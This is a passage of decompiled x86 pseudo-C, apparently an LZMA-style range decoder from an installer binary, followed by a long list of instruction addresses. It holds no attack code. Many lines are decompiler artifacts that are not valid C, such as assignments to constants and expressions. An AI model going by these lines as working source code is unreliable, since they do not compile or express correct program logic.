                              								__esi = _v8 + 0x180 + _v60 * 2;
                              								goto L135;
                              							}
                              							__eax = _v96 & 0x000000ff;
                              							__esi = _v100;
                              							__cl = 8;
                              							__cl = 8 - _v64;
                              							__esi = _v100 & _v28;
                              							__eax = (_v96 & 0x000000ff) >> 8;
                              							__ecx = _v64;
                              							__esi = (_v100 & _v28) << 8;
                              							__ecx = _v8;
                              							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                              							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                              							__eflags = _v60 - 4;
                              							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                              							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                              							if(_v60 >= 4) {
                              								__eflags = _v60 - 0xa;
                              								if(_v60 >= 0xa) {
                              									_t103 =  &_v60;
                              									 *_t103 = _v60 - 6;
                              									__eflags =  *_t103;
                              								} else {
                              									_v60 = _v60 - 3;
                              								}
                              							} else {
                              								_v60 = 0;
                              							}
                              							__eflags = _v56 - __edx;
                              							if(_v56 == __edx) {
                              								__ebx = 0;
                              								__ebx = 1;
                              								goto L63;
                              							}
                              							__eax = _v24;
                              							__eax = _v24 - _v48;
                              							__eflags = __eax - _v120;
                              							if(__eax >= _v120) {
                              								__eax = __eax + _v120;
                              								__eflags = __eax;
                              							}
                              							__ecx = _v12;
                              							__ebx = 0;
                              							__ebx = 1;
                              							__al =  *((intOrPtr*)(__eax + __ecx));
                              							_v95 =  *((intOrPtr*)(__eax + __ecx));
                              							goto L43;
                              						case 7:
                              							__eflags = _v68 - 1;
                              							if(_v68 != 1) {
                              								__eax = _v40;
                              								_v132 = 0x16;
                              								_v36 = _v40;
                              								__eax = _v44;
                              								_v40 = _v44;
                              								__eax = _v48;
                              								_v44 = _v48;
                              								__eax = 0;
                              								__eflags = _v60 - 7;
                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              								__al = __al & 0x000000fd;
                              								__eax = (__eflags >= 0) - 1 + 0xa;
                              								_v60 = (__eflags >= 0) - 1 + 0xa;
                              								__eax = _v8;
                              								__eax = _v8 + 0x664;
                              								__eflags = __eax;
                              								_v92 = __eax;
                              								goto L71;
                              							}
                              							__eax = _v8;
                              							__ecx = _v60;
                              							_v136 = 8;
                              							__esi = _v8 + 0x198 + _v60 * 2;
                              							goto L135;
                              						case 8:
                              							__eflags = _v68;
                              							if(_v68 != 0) {
                              								__eax = _v8;
                              								__ecx = _v60;
                              								_v136 = 0xa;
                              								__esi = _v8 + 0x1b0 + _v60 * 2;
                              							} else {
                              								__eax = _v60;
                              								__ecx = _v8;
                              								__eax = _v60 + 0xf;
                              								_v136 = 9;
                              								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                              								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                              							}
                              							goto L135;
                              						case 9:
                              							__eflags = _v68;
                              							if(_v68 != 0) {
                              								goto L92;
                              							}
                              							__eflags = _v100;
                              							if(_v100 == 0) {
                              								goto L174;
                              							}
                              							__eax = 0;
                              							__eflags = _v60 - 7;
                              							_t264 = _v60 - 7 >= 0;
                              							__eflags = _t264;
                              							0 | _t264 = _t264 + _t264 + 9;
                              							_v60 = _t264 + _t264 + 9;
                              							goto L78;
                              						case 0xa:
                              							__eflags = _v68;
                              							if(_v68 != 0) {
                              								__eax = _v8;
                              								__ecx = _v60;
                              								_v136 = 0xb;
                              								__esi = _v8 + 0x1c8 + _v60 * 2;
                              								goto L135;
                              							}
                              							__eax = _v44;
                              							goto L91;
                              						case 0xb:
                              							__eflags = _v68;
                              							if(_v68 != 0) {
                              								__ecx = _v40;
                              								__eax = _v36;
                              								_v36 = _v40;
                              							} else {
                              								__eax = _v40;
                              							}
                              							__ecx = _v44;
                              							_v40 = _v44;
                              							L91:
                              							__ecx = _v48;
                              							_v48 = __eax;
                              							_v44 = _v48;
                              							L92:
                              							__eax = _v8;
                              							_v132 = 0x15;
                              							__eax = _v8 + 0xa68;
                              							_v92 = _v8 + 0xa68;
                              							goto L71;
                              						case 0xc:
                              							L102:
                              							__eflags = _v112;
                              							if(_v112 == 0) {
                              								_v140 = 0xc;
                              								goto L173;
                              							}
                              							__ecx = _v116;
                              							__eax = _v16;
                              							_v20 = _v20 << 8;
                              							__ecx =  *_v116 & 0x000000ff;
                              							_v112 = _v112 - 1;
                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							_t340 =  &_v116;
                              							 *_t340 = _v116 + 1;
                              							__eflags =  *_t340;
                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							__eax = _v48;
                              							goto L104;
                              						case 0xd:
                              							L39:
                              							__eflags = _v112;
                              							if(_v112 == 0) {
                              								_v140 = 0xd;
                              								goto L173;
                              							}
                              							__ecx = _v116;
                              							__eax = _v16;
                              							_v20 = _v20 << 8;
                              							__ecx =  *_v116 & 0x000000ff;
                              							_v112 = _v112 - 1;
                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							_t127 =  &_v116;
                              							 *_t127 = _v116 + 1;
                              							__eflags =  *_t127;
                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							L41:
                              							__eax = _v68;
                              							__eflags = _v76 - _v68;
                              							if(_v76 != _v68) {
                              								goto L50;
                              							}
                              							__eflags = __ebx - 0x100;
                              							if(__ebx >= 0x100) {
                              								goto L56;
                              							}
                              							L43:
                              							__eax = _v95 & 0x000000ff;
                              							_v95 = _v95 << 1;
                              							__ecx = _v92;
                              							__eax = (_v95 & 0x000000ff) >> 7;
                              							_v76 = __eax;
                              							__eax = __eax + 1;
                              							__eax = __eax << 8;
                              							__eax = __eax + __ebx;
                              							__esi = _v92 + __eax * 2;
                              							_v20 = _v20 >> 0xb;
                              							__ax =  *__esi;
                              							_v88 = __esi;
                              							__edx = __ax & 0x0000ffff;
                              							__ecx = (_v20 >> 0xb) * __edx;
                              							__eflags = _v16 - __ecx;
                              							if(_v16 >= __ecx) {
                              								_v20 = _v20 - __ecx;
                              								_v16 = _v16 - __ecx;
                              								__cx = __ax;
                              								_v68 = 1;
                              								__cx = __ax >> 5;
                              								__eflags = __eax;
                              								__ebx = __ebx + __ebx + 1;
                              								 *__esi = __ax;
                              							} else {
                              								_v68 = _v68 & 0x00000000;
                              								_v20 = __ecx;
                              								0x800 = 0x800 - __edx;
                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                              								__ebx = __ebx + __ebx;
                              								 *__esi = __cx;
                              							}
                              							__eflags = _v20 - 0x1000000;
                              							_v72 = __ebx;
                              							if(_v20 >= 0x1000000) {
                              								goto L41;
                              							} else {
                              								goto L39;
                              							}
                              						case 0xe:
                              							L48:
                              							__eflags = _v112;
                              							if(_v112 == 0) {
                              								_v140 = 0xe;
                              								goto L173;
                              							}
                              							__ecx = _v116;
                              							__eax = _v16;
                              							_v20 = _v20 << 8;
                              							__ecx =  *_v116 & 0x000000ff;
                              							_v112 = _v112 - 1;
                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							_t161 =  &_v116;
                              							 *_t161 = _v116 + 1;
                              							__eflags =  *_t161;
                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							while(1) {
                              								L50:
                              								__eflags = __ebx - 0x100;
                              								if(__ebx >= 0x100) {
                              									break;
                              								}
                              								__eax = _v92;
                              								__edx = __ebx + __ebx;
                              								__ecx = _v20;
                              								__esi = __edx + __eax;
                              								__ecx = _v20 >> 0xb;
                              								__ax =  *__esi;
                              								_v88 = __esi;
                              								__edi = __ax & 0x0000ffff;
                              								__ecx = (_v20 >> 0xb) * __edi;
                              								__eflags = _v16 - __ecx;
                              								if(_v16 >= __ecx) {
                              									_v20 = _v20 - __ecx;
                              									_v16 = _v16 - __ecx;
                              									__cx = __ax;
                              									_t175 = __edx + 1; // 0x1
                              									__ebx = _t175;
                              									__cx = __ax >> 5;
                              									__eflags = __eax;
                              									 *__esi = __ax;
                              								} else {
                              									_v20 = __ecx;
                              									0x800 = 0x800 - __edi;
                              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              									__ebx = __ebx + __ebx;
                              									 *__esi = __cx;
                              								}
                              								__eflags = _v20 - 0x1000000;
                              								_v72 = __ebx;
                              								if(_v20 >= 0x1000000) {
                              									continue;
                              								} else {
                              									goto L48;
                              								}
                              							}
                              							L56:
                              							_t178 =  &_v56;
                              							 *_t178 = _v56 & 0x00000000;
                              							__eflags =  *_t178;
                              							goto L57;
                              						case 0xf:
                              							L60:
                              							__eflags = _v112;
                              							if(_v112 == 0) {
                              								_v140 = 0xf;
                              								goto L173;
                              							}
                              							__ecx = _v116;
                              							__eax = _v16;
                              							_v20 = _v20 << 8;
                              							__ecx =  *_v116 & 0x000000ff;
                              							_v112 = _v112 - 1;
                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							_t208 =  &_v116;
                              							 *_t208 = _v116 + 1;
                              							__eflags =  *_t208;
                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							L62:
                              							__eflags = __ebx - 0x100;
                              							if(__ebx >= 0x100) {
                              								L57:
                              								__al = _v72;
                              								_v96 = _v72;
                              								goto L58;
                              							}
                              							L63:
                              							__eax = _v92;
                              							__edx = __ebx + __ebx;
                              							__ecx = _v20;
                              							__esi = __edx + __eax;
                              							__ecx = _v20 >> 0xb;
                              							__ax =  *__esi;
                              							_v88 = __esi;
                              							__edi = __ax & 0x0000ffff;
                              							__ecx = (_v20 >> 0xb) * __edi;
                              							__eflags = _v16 - __ecx;
                              							if(_v16 >= __ecx) {
                              								_v20 = _v20 - __ecx;
                              								_v16 = _v16 - __ecx;
                              								__cx = __ax;
                              								_t222 = __edx + 1; // 0x1
                              								__ebx = _t222;
                              								__cx = __ax >> 5;
                              								__eflags = __eax;
                              								 *__esi = __ax;
                              							} else {
                              								_v20 = __ecx;
                              								0x800 = 0x800 - __edi;
                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              								__ebx = __ebx + __ebx;
                              								 *__esi = __cx;
                              							}
                              							__eflags = _v20 - 0x1000000;
                              							_v72 = __ebx;
                              							if(_v20 >= 0x1000000) {
                              								goto L62;
                              							} else {
                              								goto L60;
                              							}
                              						case 0x10:
                              							L112:
                              							__eflags = _v112;
                              							if(_v112 == 0) {
                              								_v140 = 0x10;
                              								goto L173;
                              							}
                              							__ecx = _v116;
                              							__eax = _v16;
                              							_v20 = _v20 << 8;
                              							__ecx =  *_v116 & 0x000000ff;
                              							_v112 = _v112 - 1;
                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							_t371 =  &_v116;
                              							 *_t371 = _v116 + 1;
                              							__eflags =  *_t371;
                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							goto L114;
                              						case 0x11:
                              							L71:
                              							__esi = _v92;
                              							_v136 = 0x12;
                              							goto L135;
                              						case 0x12:
                              							__eflags = _v68;
                              							if(_v68 != 0) {
                              								__eax = _v92;
                              								_v136 = 0x13;
                              								__esi = _v92 + 2;
                              								L135:
                              								_v88 = _t626;
                              								goto L136;
                              							}
                              							__eax = _v80;
                              							_v52 = _v52 & 0x00000000;
                              							__ecx = _v92;
                              							__eax = _v80 << 4;
                              							__eflags = __eax;
                              							__eax = _v92 + __eax + 4;
                              							goto L133;
                              						case 0x13:
                              							__eflags = _v68;
                              							if(_v68 != 0) {
                              								_t475 =  &_v92;
                              								 *_t475 = _v92 + 0x204;
                              								__eflags =  *_t475;
                              								_v52 = 0x10;
                              								_v68 = 8;
                              								L147:
                              								_v128 = 0x14;
                              								goto L148;
                              							}
                              							__eax = _v80;
                              							__ecx = _v92;
                              							__eax = _v80 << 4;
                              							_v52 = 8;
                              							__eax = _v92 + (_v80 << 4) + 0x104;
                              							L133:
                              							_v92 = __eax;
                              							_v68 = 3;
                              							goto L147;
                              						case 0x14:
                              							_v52 = _v52 + __ebx;
                              							__eax = _v132;
                              							goto L143;
                              						case 0x15:
                              							__eax = 0;
                              							__eflags = _v60 - 7;
                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              							__al = __al & 0x000000fd;
                              							__eax = (__eflags >= 0) - 1 + 0xb;
                              							_v60 = (__eflags >= 0) - 1 + 0xb;
                              							goto L123;
                              						case 0x16:
                              							__eax = _v52;
                              							__eflags = __eax - 4;
                              							if(__eax >= 4) {
                              								_push(3);
                              								_pop(__eax);
                              							}
                              							__ecx = _v8;
                              							_v68 = 6;
                              							__eax = __eax << 7;
                              							_v128 = 0x19;
                              							_v92 = __eax;
                              							goto L148;
                              						case 0x17:
                              							L148:
                              							__eax = _v68;
                              							_v84 = 1;
                              							_v76 = _v68;
                              							goto L152;
                              						case 0x18:
                              							L149:
                              							__eflags = _v112;
                              							if(_v112 == 0) {
                              								_v140 = 0x18;
                              								goto L173;
                              							}
                              							__ecx = _v116;
                              							__eax = _v16;
                              							_v20 = _v20 << 8;
                              							__ecx =  *_v116 & 0x000000ff;
                              							_v112 = _v112 - 1;
                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							_t490 =  &_v116;
                              							 *_t490 = _v116 + 1;
                              							__eflags =  *_t490;
                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                              							L151:
                              							_t493 =  &_v76;
                              							 *_t493 = _v76 - 1;
                              							__eflags =  *_t493;
                              							L152:
                              							__eflags = _v76;
                              							if(_v76 <= 0) {
                              								__ecx = _v68;
                              								__ebx = _v84;
                              								0 = 1;
                              								__eax = 1 << __cl;
                              								__ebx = _v84 - (1 << __cl);
                              								__eax = _v128;
                              								_v72 = __ebx;
                              								L143:
                              								_v140 = _t561;
                              								goto L3;
                              							}
                              							__eax = _v84;
                              							_v20 = _v20 >> 0xb;
                              							__edx = _v84 + _v84;
                              							__eax = _v92;
                              							__esi = __edx + __eax;
                              							_v88 = __esi;
                              							__ax =  *__esi;
                              							__edi = __ax & 0x0000ffff;
                              							__ecx = (_v20 >> 0xb) * __edi;
                              							__eflags = _v16 - __ecx;
                              							if(_v16 >= __ecx) {
                              								_v20 = _v20 - __ecx;
                              								_v16 = _v16 - __ecx;
                              								__cx = __ax;
                              								__cx = __ax >> 5;
                              								__eax = __eax - __ecx;
                              								__edx = __edx + 1;
                              								__eflags = __edx;
                              								 *__esi = __ax;
                              								_v84 = __edx;
                              							} else {
                              								_v20 = __ecx;
                              								0x800 = 0x800 - __edi;
                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              								_v84 = _v84 << 1;
                              								 *__esi = __cx;
                              							}
                              							__eflags = _v20 - 0x1000000;
                              							if(_v20 >= 0x1000000) {
                              								goto L151;
                              							} else {
                              								goto L149;
                              							}
                              						case 0x19:
                              							__eflags = __ebx - 4;
                              							if(__ebx < 4) {
                              								_v48 = __ebx;
                              								L122:
                              								_t399 =  &_v48;
                              								 *_t399 = _v48 + 1;
                              								__eflags =  *_t399;
                              								L123:
                              								__eax = _v48;
                              								__eflags = __eax;
                              								if(__eax == 0) {
                              									_v52 = _v52 | 0xffffffff;
                              									goto L173;
                              								}
                              								__eflags = __eax - _v100;
                              								if(__eax > _v100) {
                              									goto L174;
                              								}
                              								_v52 = _v52 + 2;
                              								__eax = _v52;
                              								_t406 =  &_v100;
                              								 *_t406 = _v100 + _v52;
                              								__eflags =  *_t406;
                              								goto L126;
                              							}
                              							__ecx = __ebx;
                              							__eax = __ebx;
                              							__ecx = __ebx >> 1;
                              							__eax = __ebx & 0x00000001;
                              							__ecx = (__ebx >> 1) - 1;
                              							__al = __al | 0x00000002;
                              							__eax = (__ebx & 0x00000001) << __cl;
                              							__eflags = __ebx - 0xe;
                              							_v48 = __eax;
                              							if(__ebx >= 0xe) {
                              								__ebx = 0;
                              								_v76 = __ecx;
                              								L105:
                              								__eflags = _v76;
                              								if(_v76 <= 0) {
                              									__eax = __eax + __ebx;
                              									_v68 = 4;
                              									_v48 = __eax;
                              									__eax = _v8;
                              									__eax = _v8 + 0x644;
                              									__eflags = __eax;
                              									L111:
                              									__ebx = 0;
                              									_v92 = __eax;
                              									_v84 = 1;
                              									_v72 = 0;
                              									_v76 = 0;
                              									L115:
                              									__eax = _v68;
                              									__eflags = _v76 - _v68;
                              									if(_v76 >= _v68) {
                              										_t397 =  &_v48;
                              										 *_t397 = _v48 + __ebx;
                              										__eflags =  *_t397;
                              										goto L122;
                              									}
                              									__eax = _v84;
                              									_v20 = _v20 >> 0xb;
                              									__edi = _v84 + _v84;
                              									__eax = _v92;
                              									__esi = __edi + __eax;
                              									_v88 = __esi;
                              									__ax =  *__esi;
                              									__ecx = __ax & 0x0000ffff;
                              									__edx = (_v20 >> 0xb) * __ecx;
                              									__eflags = _v16 - __edx;
                              									if(_v16 >= __edx) {
                              										__ecx = 0;
                              										_v20 = _v20 - __edx;
                              										__ecx = 1;
                              										_v16 = _v16 - __edx;
                              										__ebx = 1;
                              										__ecx = _v76;
                              										__ebx = 1 << __cl;
                              										__ecx = 1 << __cl;
                              										__ebx = _v72;
                              										__ebx = _v72 | __ecx;
                              										__cx = __ax;
                              										__cx = __ax >> 5;
                              										__eax = __eax - __ecx;
                              										__edi = __edi + 1;
                              										__eflags = __edi;
                              										_v72 = __ebx;
                              										 *__esi = __ax;
                              										_v84 = __edi;
                              									} else {
                              										_v20 = __edx;
                              										0x800 = 0x800 - __ecx;
                              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                              										_v84 = _v84 << 1;
                              										 *__esi = __dx;
                              									}
                              									__eflags = _v20 - 0x1000000;
                              									if(_v20 >= 0x1000000) {
                              										L114:
                              										_t374 =  &_v76;
                              										 *_t374 = _v76 + 1;
                              										__eflags =  *_t374;
                              										goto L115;
                              									} else {
                              										goto L112;
                              									}
                              								}
                              								__ecx = _v16;
                              								__ebx = __ebx + __ebx;
                              								_v20 = _v20 >> 1;
                              								__eflags = _v16 - _v20;
                              								_v72 = __ebx;
                              								if(_v16 >= _v20) {
                              									__ecx = _v20;
                              									_v16 = _v16 - _v20;
                              									__ebx = __ebx | 0x00000001;
                              									__eflags = __ebx;
                              									_v72 = __ebx;
                              								}
                              								__eflags = _v20 - 0x1000000;
                              								if(_v20 >= 0x1000000) {
                              									L104:
                              									_t344 =  &_v76;
                              									 *_t344 = _v76 - 1;
                              									__eflags =  *_t344;
                              									goto L105;
                              								} else {
                              									goto L102;
                              								}
                              							}
                              							__edx = _v8;
                              							__eax = __eax - __ebx;
                              							_v68 = __ecx;
                              							__eax = _v8 + 0x55e + __eax * 2;
                              							goto L111;
                              						case 0x1a:
                              							L58:
                              							__eflags = _v104;
                              							if(_v104 == 0) {
                              								_v140 = 0x1a;
                              								goto L173;
                              							}
                              							__ecx = _v108;
                              							__al = _v96;
                              							__edx = _v12;
                              							_v100 = _v100 + 1;
                              							_v108 = _v108 + 1;
                              							_v104 = _v104 - 1;
                              							 *_v108 = __al;
                              							__ecx = _v24;
                              							 *(_v12 + __ecx) = __al;
                              							__eax = __ecx + 1;
                              							__edx = 0;
                              							_t197 = __eax % _v120;
                              							__eax = __eax / _v120;
                              							__edx = _t197;
                              							goto L82;
                              						case 0x1b:
                              							L78:
                              							__eflags = _v104;
                              							if(_v104 == 0) {
                              								_v140 = 0x1b;
                              								goto L173;
                              							}
                              							__eax = _v24;
                              							__eax = _v24 - _v48;
                              							__eflags = __eax - _v120;
                              							if(__eax >= _v120) {
                              								__eax = __eax + _v120;
                              								__eflags = __eax;
                              							}
                              							__edx = _v12;
                              							__cl =  *(__edx + __eax);
                              							__eax = _v24;
                              							_v96 = __cl;
                              							 *(__edx + __eax) = __cl;
                              							__eax = __eax + 1;
                              							__edx = 0;
                              							_t280 = __eax % _v120;
                              							__eax = __eax / _v120;
                              							__edx = _t280;
                              							__eax = _v108;
                              							_v100 = _v100 + 1;
                              							_v108 = _v108 + 1;
                              							_t289 =  &_v104;
                              							 *_t289 = _v104 - 1;
                              							__eflags =  *_t289;
                              							 *_v108 = __cl;
                              							L82:
                              							_v24 = __edx;
                              							goto L83;
                              						case 0x1c:
                              							while(1) {
                              								L126:
                              								__eflags = _v104;
                              								if(_v104 == 0) {
                              									break;
                              								}
                              								__eax = _v24;
                              								__eax = _v24 - _v48;
                              								__eflags = __eax - _v120;
                              								if(__eax >= _v120) {
                              									__eax = __eax + _v120;
                              									__eflags = __eax;
                              								}
                              								__edx = _v12;
                              								__cl =  *(__edx + __eax);
                              								__eax = _v24;
                              								_v96 = __cl;
                              								 *(__edx + __eax) = __cl;
                              								__eax = __eax + 1;
                              								__edx = 0;
                              								_t420 = __eax % _v120;
                              								__eax = __eax / _v120;
                              								__edx = _t420;
                              								__eax = _v108;
                              								_v108 = _v108 + 1;
                              								_v104 = _v104 - 1;
                              								_v52 = _v52 - 1;
                              								__eflags = _v52;
                              								 *_v108 = __cl;
                              								_v24 = _t420;
                              								if(_v52 > 0) {
                              									continue;
                              								} else {
                              									L83:
                              									_v140 = 2;
                              									goto L3;
                              								}
                              							}
                              							_v140 = 0x1c;
                              							L173:
                              							_push(0x22);
                              							_pop(_t574);
                              							memcpy(_v148,  &_v140, _t574 << 2);
                              							return 0;
                              					}
                              				}
                              				L174:
                              				_t538 = _t537 | 0xffffffff;
                              				return _t538;
                              			}
                              0x00406de8
                              0x00406de8
                              0x00406de8
                              0x00406deb
                              0x00406dee
                              0x00000000
                              0x00000000
                              0x004069be
                              0x004069be
                              0x004069c2
                              0x0040712f
                              0x00000000
                              0x0040712f
                              0x004069c8
                              0x004069cb
                              0x004069ce
                              0x004069d2
                              0x004069d5
                              0x004069db
                              0x004069dd
                              0x004069dd
                              0x004069dd
                              0x004069e0
                              0x004069e3
                              0x004069e3
                              0x004069e6
                              0x004069e9
                              0x00000000
                              0x00000000
                              0x004069ef
                              0x004069f5
                              0x00000000
                              0x00000000
                              0x004069fb
                              0x004069fb
                              0x004069ff
                              0x00406a02
                              0x00406a05
                              0x00406a08
                              0x00406a0b
                              0x00406a0c
                              0x00406a0f
                              0x00406a11
                              0x00406a17
                              0x00406a1a
                              0x00406a1d
                              0x00406a20
                              0x00406a23
                              0x00406a26
                              0x00406a29
                              0x00406a45
                              0x00406a48
                              0x00406a4b
                              0x00406a4e
                              0x00406a55
                              0x00406a59
                              0x00406a5b
                              0x00406a5f
                              0x00406a2b
                              0x00406a2b
                              0x00406a2f
                              0x00406a37
                              0x00406a3c
                              0x00406a3e
                              0x00406a40
                              0x00406a40
                              0x00406a62
                              0x00406a69
                              0x00406a6c
                              0x00000000
                              0x00406a72
                              0x00000000
                              0x00406a72
                              0x00000000
                              0x00406a77
                              0x00406a77
                              0x00406a7b
                              0x0040713b
                              0x00000000
                              0x0040713b
                              0x00406a81
                              0x00406a84
                              0x00406a87
                              0x00406a8b
                              0x00406a8e
                              0x00406a94
                              0x00406a96
                              0x00406a96
                              0x00406a96
                              0x00406a99
                              0x00406a9c
                              0x00406a9c
                              0x00406a9c
                              0x00406aa2
                              0x00000000
                              0x00000000
                              0x00406aa4
                              0x00406aa7
                              0x00406aaa
                              0x00406aad
                              0x00406ab0
                              0x00406ab3
                              0x00406ab6
                              0x00406ab9
                              0x00406abc
                              0x00406abf
                              0x00406ac2
                              0x00406ada
                              0x00406add
                              0x00406ae0
                              0x00406ae3
                              0x00406ae3
                              0x00406ae6
                              0x00406aea
                              0x00406aec
                              0x00406ac4
                              0x00406ac4
                              0x00406acc
                              0x00406ad1
                              0x00406ad3
                              0x00406ad5
                              0x00406ad5
                              0x00406aef
                              0x00406af6
                              0x00406af9
                              0x00000000
                              0x00406afb
                              0x00000000
                              0x00406afb
                              0x00406af9
                              0x00406b00
                              0x00406b00
                              0x00406b00
                              0x00406b00
                              0x00000000
                              0x00000000
                              0x00406b3b
                              0x00406b3b
                              0x00406b3f
                              0x00407147
                              0x00000000
                              0x00407147
                              0x00406b45
                              0x00406b48
                              0x00406b4b
                              0x00406b4f
                              0x00406b52
                              0x00406b58
                              0x00406b5a
                              0x00406b5a
                              0x00406b5a
                              0x00406b5d
                              0x00406b60
                              0x00406b60
                              0x00406b66
                              0x00406b04
                              0x00406b04
                              0x00406b07
                              0x00000000
                              0x00406b07
                              0x00406b68
                              0x00406b68
                              0x00406b6b
                              0x00406b6e
                              0x00406b71
                              0x00406b74
                              0x00406b77
                              0x00406b7a
                              0x00406b7d
                              0x00406b80
                              0x00406b83
                              0x00406b86
                              0x00406b9e
                              0x00406ba1
                              0x00406ba4
                              0x00406ba7
                              0x00406ba7
                              0x00406baa
                              0x00406bae
                              0x00406bb0
                              0x00406b88
                              0x00406b88
                              0x00406b90
                              0x00406b95
                              0x00406b97
                              0x00406b99
                              0x00406b99
                              0x00406bb3
                              0x00406bba
                              0x00406bbd
                              0x00000000
                              0x00406bbf
                              0x00000000
                              0x00406bbf
                              0x00000000
                              0x00406e4c
                              0x00406e4c
                              0x00406e50
                              0x00407177
                              0x00000000
                              0x00407177
                              0x00406e56
                              0x00406e59
                              0x00406e5c
                              0x00406e60
                              0x00406e63
                              0x00406e69
                              0x00406e6b
                              0x00406e6b
                              0x00406e6b
                              0x00406e6e
                              0x00000000
                              0x00000000
                              0x00406c1c
                              0x00406c1c
                              0x00406c1f
                              0x00000000
                              0x00000000
                              0x00406f5b
                              0x00406f5f
                              0x00406f81
                              0x00406f84
                              0x00406f8e
                              0x00406f91
                              0x00406f91
                              0x00000000
                              0x00406f91
                              0x00406f61
                              0x00406f64
                              0x00406f68
                              0x00406f6b
                              0x00406f6b
                              0x00406f6e
                              0x00000000
                              0x00000000
                              0x00407018
                              0x0040701c
                              0x0040703a
                              0x0040703a
                              0x0040703a
                              0x00407041
                              0x00407048
                              0x0040704f
                              0x0040704f
                              0x00000000
                              0x0040704f
                              0x0040701e
                              0x00407021
                              0x00407024
                              0x00407027
                              0x0040702e
                              0x00406f72
                              0x00406f72
                              0x00406f75
                              0x00000000
                              0x00000000
                              0x00407109
                              0x0040710c
                              0x00000000
                              0x00000000
                              0x00406d43
                              0x00406d45
                              0x00406d4c
                              0x00406d4d
                              0x00406d4f
                              0x00406d52
                              0x00000000
                              0x00000000
                              0x00406d5a
                              0x00406d5d
                              0x00406d60
                              0x00406d62
                              0x00406d64
                              0x00406d64
                              0x00406d65
                              0x00406d68
                              0x00406d6f
                              0x00406d72
                              0x00406d80
                              0x00000000
                              0x00000000
                              0x00407056
                              0x00407056
                              0x00407059
                              0x00407060
                              0x00000000
                              0x00000000
                              0x00407065
                              0x00407065
                              0x00407069
                              0x004071a1
                              0x00000000
                              0x004071a1
                              0x0040706f
                              0x00407072
                              0x00407075
                              0x00407079
                              0x0040707c
                              0x00407082
                              0x00407084
                              0x00407084
                              0x00407084
                              0x00407087
                              0x0040708a
                              0x0040708a
                              0x0040708a
                              0x0040708a
                              0x0040708d
                              0x0040708d
                              0x00407091
                              0x004070f1
                              0x004070f4
                              0x004070f9
                              0x004070fa
                              0x004070fc
                              0x004070fe
                              0x00407101
                              0x0040700d
                              0x0040700d
                              0x00000000
                              0x0040700d
                              0x00407093
                              0x00407099
                              0x0040709c
                              0x0040709f
                              0x004070a2
                              0x004070a5
                              0x004070a8
                              0x004070ab
                              0x004070ae
                              0x004070b1
                              0x004070b4
                              0x004070cd
                              0x004070d0
                              0x004070d3
                              0x004070d6
                              0x004070da
                              0x004070dc
                              0x004070dc
                              0x004070dd
                              0x004070e0
                              0x004070b6
                              0x004070b6
                              0x004070be
                              0x004070c3
                              0x004070c5
                              0x004070c8
                              0x004070c8
                              0x004070e3
                              0x004070ea
                              0x00000000
                              0x004070ec
                              0x00000000
                              0x004070ec
                              0x00000000
                              0x00406d88
                              0x00406d8b
                              0x00406dc1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef4
                              0x00406ef4
                              0x00406ef7
                              0x00406ef9
                              0x00407183
                              0x00000000
                              0x00407183
                              0x00406eff
                              0x00406f02
                              0x00000000
                              0x00000000
                              0x00406f08
                              0x00406f0c
                              0x00406f0f
                              0x00406f0f
                              0x00406f0f
                              0x00000000
                              0x00406f0f
                              0x00406d8d
                              0x00406d8f
                              0x00406d91
                              0x00406d93
                              0x00406d96
                              0x00406d97
                              0x00406d99
                              0x00406d9b
                              0x00406d9e
                              0x00406da1
                              0x00406db7
                              0x00406dbc
                              0x00406df4
                              0x00406df4
                              0x00406df8
                              0x00406e24
                              0x00406e26
                              0x00406e2d
                              0x00406e30
                              0x00406e33
                              0x00406e33
                              0x00406e38
                              0x00406e38
                              0x00406e3a
                              0x00406e3d
                              0x00406e44
                              0x00406e47
                              0x00406e74
                              0x00406e74
                              0x00406e77
                              0x00406e7a
                              0x00406eee
                              0x00406eee
                              0x00406eee
                              0x00000000
                              0x00406eee
                              0x00406e7c
                              0x00406e82
                              0x00406e85
                              0x00406e88
                              0x00406e8b
                              0x00406e8e
                              0x00406e91
                              0x00406e94
                              0x00406e97
                              0x00406e9a
                              0x00406e9d
                              0x00406eb6
                              0x00406eb8
                              0x00406ebb
                              0x00406ebc
                              0x00406ebf
